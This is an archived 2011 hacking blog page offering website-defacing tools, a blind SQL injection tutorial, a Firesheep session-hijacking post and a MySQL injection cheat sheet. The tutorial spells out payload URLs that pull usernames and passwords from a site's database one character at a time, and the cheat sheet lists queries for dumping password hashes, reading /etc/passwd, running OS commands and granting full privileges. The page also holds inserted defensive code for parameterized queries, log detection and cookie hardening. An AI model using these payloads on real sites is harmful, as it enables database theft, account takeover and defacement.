Thursday, August 11, 2011

Top Website Defacing Toolz





Want to deface a website? These are the tools you need.






Wednesday, August 10, 2011

Blind Sql Injection text and video tutorial by t3rm!n4t0r N k1ll3ra





What we discussed above comes under error-based SQL injection. Let us now discuss the harder part, i.e. blind SQL injection.
We use our example:
http://www.site.com/news.php?id=7
Let's test it:


http://www.site.com/news.php?id=7 and 1=1 <--- this is always true and the page loads normally, that's ok.
http://www.site.com/news.php?id=7 and 1=2 <--- this is false, so if some text, picture or other content is missing on the returned page, then that site is vulnerable to blind SQL injection. ☺
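The reason the `and 1=1` / `and 1=2` pair works is that the site pastes the raw id parameter into its SQL text. The following Python is an added example written for this page (it is not code from the tutorial's authors): a constructed in-memory sqlite3 table stands in for the site's MySQL news table, `fetch_vulnerable` reproduces the string-concatenation pattern, `fetch_hardened` validates and binds the parameter instead, and `oracle_present` runs the tutorial's own true/false test against each handler to show that the hardened one no longer answers differently.

```python
import sqlite3

# Constructed stand-in for the news table behind news.php?id=N (assumption:
# the real site runs MySQL; sqlite3 is used only so the example runs offline).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(7, "Seventh article"), (8, "Eighth article")])
    return conn

def fetch_vulnerable(conn, raw_id):
    """The pattern the tutorial relies on: the raw id parameter is pasted into
    the SQL text, so 'and 1=1' / 'and 1=2' become part of the WHERE clause."""
    sql = "SELECT title FROM news WHERE id = " + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def fetch_hardened(conn, raw_id):
    """Validate the parameter as an integer and bind it through a placeholder.
    The SQL text is constant, so a request cannot change the query's logic."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return None  # reject anything that is not a whole number
    row = conn.execute("SELECT title FROM news WHERE id = ?", (article_id,)).fetchone()
    return row[0] if row else None

def oracle_present(fetch, conn, base_id):
    """The tutorial's test: does the page differ between an always-true and an
    always-false condition? A difference means the endpoint leaks one bit per request."""
    true_page = fetch(conn, base_id + " and 1=1")
    false_page = fetch(conn, base_id + " and 1=2")
    return true_page != false_page

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks a boolean oracle:", oracle_present(fetch_vulnerable, db, "7"))
    print("hardened handler leaks a boolean oracle:  ", oracle_present(fetch_hardened, db, "7"))
```

With the vulnerable handler the two requests return different pages, which is exactly the signal the rest of the tutorial builds on; with the bound parameter both malformed ids are rejected before any SQL runs, so there is nothing to observe.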


GETTING MySQL VERSION


To get the MySQL version in a blind attack we use substring:
http://www.site.com/news.php?id=7 and substring(@@version,1,1)=4
This should return TRUE if the MySQL version is 4. Replace 4 with 5; if the query returns TRUE, the version is 5.


CHECKING FOR SUBSELECT


When a plain SELECT doesn't work, we use a subselect:
http://www.site.com/news.php?id=7 and (select 1)=1
If the page loads normally, subselects work. Next we check whether we have access to mysql.user:
http://www.site.com/news.php?id=7 and (select 1 from mysql.user limit 0,1)=1
If the page loads normally we have access to mysql.user, and later we can pull some passwords using the load_file() function and OUTFILE.


CHECKING FOR TABLE AND COLUMN NAME


Here luck and guessing work more than anything ☺
http://www.site.com/news.php?id=7 and (select 1 from users limit 0,1)=1
(With limit 0,1 our query returns one row of data; this is very important, because a subselect used like this may return only one row.)
If the page then loads normally without content missing, the table users exists. If you get FALSE (some article missing), just change the table name until you guess the right one.


Let's say we have found that the table name is users; now what we need is a column name. As with the table name, we start guessing. Like I said before, try the common names for columns:
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally we know the column name is password (if we get FALSE, try other common names or just guess). Here we concatenate 1 with the password column, so substring(...,1,1) returns the first character, which is that 1; the comparison can only be TRUE if the column exists, otherwise the query fails and content goes missing.


PULL DATA FROM DATABASE


We found the table users and the columns username and password, so we are going to pull characters from them. Like:
http://www.site.com/news.php?id=7 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
This pulls the first character from the first user in table users. Substring here returns the first character, 1 character in length. ascii() converts that character into its ASCII value, which is then compared using the greater-than operator >. So if the ASCII value of the character is greater than 80, the page loads normally (TRUE); we keep trying until we get FALSE.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
We get TRUE, keep incrementing.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
So the first character of the username is char(99). Using an ASCII table we know that char(99) is the letter 'c'.
Keep incrementing the character position until you reach the end (when >0 returns FALSE we know we have reached the end).
There are lots of tools available for blind SQL injection, and people use them because nobody likes manual work: blind SQL injection tries your whole patience ☺
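Every step of the technique above leaves a recognisable trace in the web server's access log, and the character-by-character extraction in particular produces a burst of near-identical requests that differ only in the comparison value. The following Python is an added example written for this page (not code from the tutorial's authors or from any tool it mentions): it scans constructed combined-format log lines that mirror the requests shown above, tags each request with the step of the technique it matches, and flags any client whose extraction probes reach a threshold. The IP addresses, timestamps and response sizes are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed combined-format access-log lines mirroring the requests shown in the
# tutorial above; addresses are from documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2011:14:02:11 +0000] "GET /news.php?id=7 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Aug/2011:14:02:13 +0000] "GET /news.php?id=7%20and%201=1 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Aug/2011:14:02:15 +0000] "GET /news.php?id=7%20and%201=2 HTTP/1.1" 200 4870
203.0.113.5 - - [10/Aug/2011:14:02:20 +0000] "GET /news.php?id=7%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Aug/2011:14:02:24 +0000] "GET /news.php?id=7%20and%20(select%201%20from%20mysql.user%20limit%200,1)=1 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Aug/2011:14:02:31 +0000] "GET /news.php?id=7%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Aug/2011:14:02:33 +0000] "GET /news.php?id=7%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E95 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Aug/2011:14:02:35 +0000] "GET /news.php?id=7%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E99 HTTP/1.1" 200 4870
198.51.100.9 - - [10/Aug/2011:14:03:01 +0000] "GET /news.php?id=8 HTTP/1.1" 200 5301
"""

# ip, method, target, status, size from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Each signature matches one step of the boolean-blind technique on the decoded query string.
SIGNATURES = {
    "boolean_probe":   re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "version_probe":   re.compile(r"substring\s*\(\s*@@version"),
    "subselect_probe": re.compile(r"\(\s*select\s+1\s+from\b"),
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\("),
}

def classify_target(target):
    """Return the set of signature names that fire on a request target."""
    query = unquote_plus(urlsplit(target).query).lower()
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}

def analyze(log_text, extraction_threshold=3):
    """Scan log lines; return per-request findings plus the client IPs whose
    char_extraction probe count reached the threshold (an extraction run in progress)."""
    findings = []
    extraction_count = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status, size = m.groups()
        kinds = classify_target(target)
        if not kinds:
            continue
        findings.append({"ip": ip, "target": target, "kinds": sorted(kinds),
                         "status": status, "size": size})
        if "char_extraction" in kinds:
            extraction_count[ip] += 1
    extracting = {ip for ip, n in extraction_count.items() if n >= extraction_threshold}
    return findings, extracting

if __name__ == "__main__":
    hits, extracting = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["size"], ",".join(h["kinds"]), h["target"][:60])
    print("clients running character extraction:", sorted(extracting))
```

Two points worth noting when adapting this: the response size is a second, signature-free signal (in the sample the FALSE pages are consistently smaller than the TRUE pages for the same path), and the threshold should be low, since the whole point of the technique is that every single request looks like a successful 200 to the application.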


Blind Sql Injection VIDEO TUTZ By k1ll3ra.rar 5.6MB (Archive)



HTML tutorial

Friday, August 5, 2011

Firesheep Can Hack Social Network Accounts

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Today at Toorcon 12 I announced the release of Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.
As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:
Double-click on someone, and you're instantly logged in as them.
That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.
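The post's fix is end-to-end HTTPS, and on the application side that means the session cookie must never be allowed to travel over plain HTTP. The following Python is an added example written for this page (it is not Firesheep's code or part of the post): `audit_response` checks a response's scheme, Strict-Transport-Security header and Set-Cookie attributes for the conditions that make a session sidejackable, and `harden_set_cookie` rewrites a cookie header so the browser only sends it over HTTPS and keeps it out of reach of script. The header lists are constructed, not captured from any site, and the cookie name `sessionid` is an assumption.

```python
# Constructed response header lists, shaped like http.client's getheaders()
# output of (name, value) tuples; neither is captured from a real site.
VULNERABLE_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "sessionid=abc123; Path=/"),
]
HARDENED_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

# Canonical spellings for rendering; attribute names are case-insensitive on the wire.
CANONICAL = {"path": "Path", "domain": "Domain", "expires": "Expires", "max-age": "Max-Age",
             "secure": "Secure", "httponly": "HttpOnly", "samesite": "SameSite"}

def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, {attribute: value or True})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs

def audit_response(scheme, headers):
    """Return the findings that leave the session open to sidejacking as described above."""
    findings = []
    lowered = [(k.lower(), v) for k, v in headers]
    if scheme != "https":
        findings.append("response served over plain HTTP: every request carrying the cookie is readable on the wire")
    elif not any(k == "strict-transport-security" for k, _ in lowered):
        findings.append("no Strict-Transport-Security header: a browser can still be sent to the http:// version")
    for key, val in lowered:
        if key != "set-cookie":
            continue
        name, _value, attrs = parse_set_cookie(val)
        if "secure" not in attrs:
            findings.append(f"cookie {name!r} lacks Secure: the browser will also send it over http://")
        if "httponly" not in attrs:
            findings.append(f"cookie {name!r} lacks HttpOnly: readable by script injected into the page")
    return findings

def harden_set_cookie(header_value):
    """Rewrite a Set-Cookie value so the cookie only travels over HTTPS and is not script-readable."""
    name, value, attrs = parse_set_cookie(header_value)
    attrs.setdefault("path", "/")
    attrs["secure"] = True
    attrs["httponly"] = True
    attrs.setdefault("samesite", "Lax")
    rendered = [f"{name}={value}"]
    for key, val in attrs.items():
        label = CANONICAL.get(key, key)
        rendered.append(label if val is True else f"{label}={val}")
    return "; ".join(rendered)

if __name__ == "__main__":
    for finding in audit_response("http", VULNERABLE_HEADERS):
        print("FINDING:", finding)
    print("hardened header:", harden_set_cookie("sessionid=abc123; Path=/"))
    print("hardened findings:", audit_response("https", HARDENED_HEADERS))
```

The Secure flag is the one that directly defeats the capture shown in the post: without it, a single http:// link or image on the site makes the browser send the cookie in the clear even if the login itself was encrypted, which is the gap the post describes as "encrypting the initial login" but nothing else.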

System Requirements

  • Mac OS X: 10.5 or newer on an Intel processor.
  • Windows: XP or newer. Install Winpcap first!
  • Linux: Not currently supported.
  • Firefox: 3.6.12 or newer. 32-bit only. Firefox 4.x beta not supported.[http://www.filehippo.com/download_firefox/]

Download

Firesheep Hack Social Network Account Demo








Thursday, August 4, 2011

MySQL SQL Injection Cheat Sheet


Version
    SELECT @@version
Comments
    SELECT 1; #comment
    SELECT /*comment*/1;
Current User
    SELECT user();
    SELECT system_user();
List Users
    SELECT user FROM mysql.user; -- priv
List Password Hashes
    SELECT host, user, password FROM mysql.user; -- priv
Password Cracker
    John the Ripper will crack MySQL password hashes.
List Privileges
    SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
    SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
    SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
    SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns
List DBA Accounts
    SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
    SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
Current Database
    SELECT database()
List Databases
    SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
    SELECT distinct(db) FROM mysql.db -- priv
List Columns
    SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
List Tables
    SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name
    SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username'
Select Nth Row
    SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
    SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char
    SELECT substr('abcd', 3, 1); # returns c
Bitwise AND
    SELECT 6 & 2; # returns 2
    SELECT 6 & 1; # returns 0
ASCII Value -> Char
    SELECT char(65); # returns A
Char -> ASCII Value
    SELECT ascii('A'); # returns 65
Casting
    SELECT cast('1' AS unsigned integer);
    SELECT cast('123' AS char);
String Concatenation
    SELECT CONCAT('A','B'); # returns AB
    SELECT CONCAT('A','B','C'); # returns ABC
If Statement
    SELECT if(1=1,'foo','bar'); -- returns 'foo'
Case Statement
    SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
Avoiding Quotes
    SELECT 0x414243; # returns ABC
Time Delay
    SELECT BENCHMARK(1000000,MD5('A'));
    SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests
    Impossible?
Command Execution
    If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture, which may or may not be the same as your attack platform.
Local File Access
    ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
    SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
Hostname, IP Address
    Impossible?
Create Users
    CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv
Delete Users
    DROP USER test1; -- priv
Make User DBA
    GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
Location of DB files
    SELECT @@datadir;
Default/System Databases
    information_schema (>= mysql 5.0)
    mysql